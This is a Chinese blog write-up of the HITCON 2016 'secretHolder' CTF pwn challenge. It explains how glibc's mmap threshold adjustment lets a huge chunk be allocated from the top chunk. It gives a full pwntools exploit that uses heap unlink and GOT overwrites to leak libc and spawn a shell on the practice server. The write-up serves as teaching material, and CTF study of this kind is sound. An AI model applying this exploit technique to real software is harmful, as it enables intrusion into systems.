secretHolder_hitcon_2016(有关mmap的chunk如何分配到top chunk里与普通chunk相邻)

最新推荐文章于 2024-08-21 13:54:14 发布
最新推荐文章于 2024-08-21 13:54:14 发布
阅读量684 收藏 1
点赞数 2
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105860150
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

secretHolder_hitcon_2016

这题和上一题https://blog.csdn.net/seaaseesa/article/details/105856878功能相似,并且上一题的利用手法这里同样可以利用,这里,有另一种手法,从而引出了一个新的知识点。

这题,delete功能里增加了对huge chunk的free

 

Huge chunk的大小为0x61A80,这会使用mmap来分配。

我们先来看一下glibc的源码,当top chunk的size满足不了申请的大小后,就会调用sysmalloc来分配chunk给用户。

当top chunk为空,或者请求的size大于等于mmap的阈值,会使用mmap来映射内存给用户。

并且映射的大小是页对齐的

否则,扩展top chunk,然后从top chunk里分配内存

因此,我们只要从第一个if判断阈值那里逃逸过去,这样就可以从top chunk里分配。

我们看看这个阈值

程序中的huge chunk大小为0x61A80,大于最小阈值,因此第一次malloc(0x61A80),使用mmap分配内存。当free这个chunk的时候,我们看到free的源码,对阈值做了调整,将阈值设置为了chunksize,由于之前申请chunk时,size做了页对齐,所以,此时chunksize(p)为0x62000,,也就是阈值将修改为0x62000。

下一次,我们重新malloc的时候,只要nb大小小于0x62000这个阈值,就会从top chunk分配。因此,当我们再次malloc(0x61A80)的时候,nb = 0x61A90,小于阈值,就绕过了if,执行后面的代码从top chunk分配。

我们可以做个实验

#include <stdio.h>
#include <stdlib.h>

char *ptr;

int main() {
   setbuf(stdout,0);
   setbuf(stdin,0);
   setbuf(stderr,0);
   ptr = malloc(0x61A800);
   printf("huge chunk ptr=0x%lx\n",ptr);
   printf("free huge chunk\n");
   free(ptr);
   printf("malloc huge chunk\n");
   ptr = malloc(0x61A800);
   printf("huge chunk ptr=0x%lx\n",ptr);
   getchar();
}

我们看到第二次申请回来的时候,地址变成了普通堆的地址。

那么,我们回到题目,我们可以先构造堆布局

0x30 fastbin

0xFB0 unsorted bin

Top chunk

 

由于bss上保留了堆指针没有清空,接下来,我们malloc huge chunk,首先会发生malloc_consolidate,将fastbin也合并到top chunk,接下来调用sysmalloc,扩展top chunk,然后从top chunk里分配。最终,返回的chunk地址与0x30的fastbin的地址是同一个。那么,通过这个huge chunk,在对应指针指向的位置伪造几个chunk,最后通过delete unsorted bin那个chunk对应的指针,达到unlink。实现了unlink后,就可以实现任意地址读写。

#coding:utf8
from pwn import *

#context.log_level = 'debug'
#sh = process('./secretHolder_hitcon_2016')
sh = remote('node3.buuoj.cn',25895)
elf = ELF('./secretHolder_hitcon_2016')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
atoi_got = elf.got['atoi']
free_got = elf.got['free']
puts_plt = elf.plt['puts']

def add(type,content):
   sh.sendlineafter('3. Renew secret','1')
   sh.sendlineafter('3. Huge secret',str(type))
   sh.sendafter('Tell me your secret:',content)

def delete(type):
   sh.sendlineafter('3. Renew secret','2')
   sh.sendlineafter('3. Huge secret',str(type))

def edit(type,content):
   sh.sendlineafter('3. Renew secret','3')
   sh.sendlineafter('3. Huge secret',str(type))
   sh.sendafter('Tell me your secret:',content)

huge_ptr_addr = 0x00000000006020A8
add(1,'a'*0x20) #small
add(2,'b'*0x20) #big
delete(1)
delete(2)
#使用了mmap分配大chunk
add(3,'c'*0x20)
#释放后,阈值被调整,下一次将从top chunk里分配
delete(3)
#chunk1
fake_chunk = p64(0) + p64(0x21)
#fd、bk
fake_chunk += p64(huge_ptr_addr - 0x18) + p64(huge_ptr_addr - 0x10)
fake_chunk += p64(0x20) + p64(0x100)
fake_chunk += 'b'*0xF0
fake_chunk += (p64(0) + p64(0x21) + 'd'*0x10) * 2
add(3,fake_chunk)
#unlink
delete(2)
#控制堆数组
edit(3,'\x00'*0x10 + p64(atoi_got) + p64(atoi_got) + p64(free_got) + p64(1)*3)
#修改free的got表为puts的plt
edit(1,p64(puts_plt))
#泄露atoi的got表
delete(3)
sh.recvuntil('\n')
atoi_addr = u64(sh.recv(6).ljust(8,'\x00'))
libc_base = atoi_addr - libc.sym['atoi']
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
#修改atoi的got表为system地址
edit(2,p64(system_addr))
#getshell
sh.sendlineafter('3. Renew secret','sh\x00')

sh.interactive()

 

ha1vk
关注
专栏目录
houseoforange_hitcon_2016
fayinq的博客
04-07 268
houseoforange_hitcon_2016 先检查保护 保护全开 FSOP:对于_IO_FILE_plus结构体的利用 首先,在分析这个题目之前,我们需要知道两个知识点,一个是_IO_FILE_plus,一个是FSOP _IO_FILE_PLUS _IO_FILE_plus是ptmalloc中定义的一种结构体,他决定了很多东西,先在gdb面查看一眼 在此,我们就用本次题目中会使用到的_IO_list_all结构体来作为参考。 _IO_FILE_plus 主要是由两个部分组成,其中一个是_IO
houseoforange_hitcon_2016(House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1584
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
[XCTF-pwn] 35_hitcon-ctf-2016_secret_holder
weixin_52640415的博客
03-10 301
区块会因为top_chunk不够大在新地址新建,释放后收回,这时建小块在旧地址释放,再建巨块时会在旧地址扩充。 程序未开pie,free时只清标记,但free时不检查标记,可以UAF。 思路: 建巨块释放建小块释放再建巨块(在旧堆块,与小块同一块) 由于未删指针,此时小块巨块指针相同,释放小块实然上是释放大块,大块标记保留。 建小块和大块,通过巨块指针修改小块和大块头unlink 控制指针区后随便搞。 完整exp: from pwn import * local = 0 if local
HITCON_CTF_2016_Secret Holder
人饭子的博客
12-31 297
HITCON_CTF_2016:Secret Holder 一、信息收集 RELRO:在Linux系统安全领域数据可以写的存储区就会是攻击的目标,尤其是存储函数指针的区域。 所以在安全防护的角度来说尽量减少可写的存储区域对安全会有极大的好处.GCC, GNU linker以及Glibc-dynamic linker一起配合实现了一种叫做relro的技术: read only relocatio...
CTFshow菜狗杯-misc-wp(详解 脚本 过程 全)
最新发布
qq_53058639的博客
08-21 1011
废话不多话开启你们的旅程吧 这个也是我这几天才看 一些见解和思路分享给你们希望你们在旅途中玩的开心,学的开心✌( •̀ ω •́ )y。
ptmalloc——mmaped chunk
weixin_34247155的博客
06-21 110
2019独角兽企业重金招聘Python工程师标准>>> ...
2016 HITCON CTF SleepyHolder
Bill
04-22 1737
2016 HITCON CTF SleepyHolder 序言 本来这周准备学习House_Of_Orange, 但是这个牵扯知识点太多. 忽然发现还有一个fastbin_dup_consolidate没有学习, 补一下. 程序运行(文章尾部有程序源码) 1. MENU 1. Keep secret 2. Wipe secret 3. Renew secret 2....
(unlink) HITCON CTF 2016 : Sleepy Holder
qq_36918532的博客
01-20 340
今天仍然是复习unlink的原理和利用过程 这个跟Secret Holder类似的,只不过huge secret一旦创建就无法删除了和修改了(我之前写payload时候忘记了,还delete(3)。。。) 安全检查之后拖到IDA面:菜单题 free功能好像没什么毛病 修改功能好像也没什么问题(难道问题在分配面) 看到分配功能,也就是三个秘密分配,也没有什么分配函数读取越界溢出,或者off-by-null漏洞 然后大致只得到了,分配通过flag的位置是否为1,来判断的并且其相对的布局分别是 0x602
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
【信息安全与数据安全】 信息安全是当今数字时代的重要议题,涉及到个人隐私、企业机密以及社会基础设施的保护。数据安全是信息安全的一个核心方面,它关注的是如何保护数据免受未经授权的访问、泄露、篡改或破坏。...
HITCON Trainging lab13 学习Chunk Extend and Overlapping 攻击
qq_36495104的博客
05-08 266
查看保护措施,RelRO为Partial,即可以修改GOT表项 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-znarZnkX-1588937420199)(F:\wangpei\笔记\pwn\note\assets\1588837137968.png)] 这个题目,定义了一种heap结构体,大概如下 struct heap { size; #heap的大小;8字节 content; #指针,指向content;8字节 } 下面是main函数,定义了菜单选
攻防世界 pwn 进阶 secret_holder
yongbaoii的博客
02-18 353
进去给了个网站让我自己下载附件,找半天没找到,最终还是嫖了个现成的。 https://pwn-1253291247.cos.ap-chengdu.myqcloud.com/SecretHolder 看一手保护,PIE没有开,还好,RELRO也没有全开,第一想法可以考虑劫持一手GOT表。 又是菜单题,主程序简单,且有循环。 程序很简单,三个秘密,然后地址跟flag都在bss段上,分别占了八个跟四个字节。 同时calloc函数跟malloc函数一样,申请空间,区别是calloc函数会把申请到得空间都清零。
unlink-secretholder
csdn546229768的博客
01-13 231
题目 : hitconctf2016-secretholder 保护: add函数: dele函数: update函数: 总体下来可以发现程序很简单,漏洞有uaf 和 double free,堆块类型是否可以malloc \ 修改由bss段中的xx_is_use决定,无pie,可通过修改got表或者将one_gadget写入__malloc_hook__free_hook中getshell,那么这的限制条件就是只能malloc三种类型的chunk,分别是一个fast chunk和2个large
CTFshow-Web入门-Web1-20 (信息收集完结篇)
m0_61155226的博客
03-07 8298
CTFshow-Web入门-Web11-20 (信息收集完结篇)
ctfshow 每周大挑战 极限命令执行
m0_64815693的博客
02-12 3984
ctfshow 每周大挑战 极限命令执行 wp
CTFshow 1-10关
weixin_62369433的博客
11-11 2251
CTFshow 1-10 通关详解
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1966
ctfshow pwn入门-前置基础pwn13-pwn19
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
Jay17的博客
08-16 3513
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值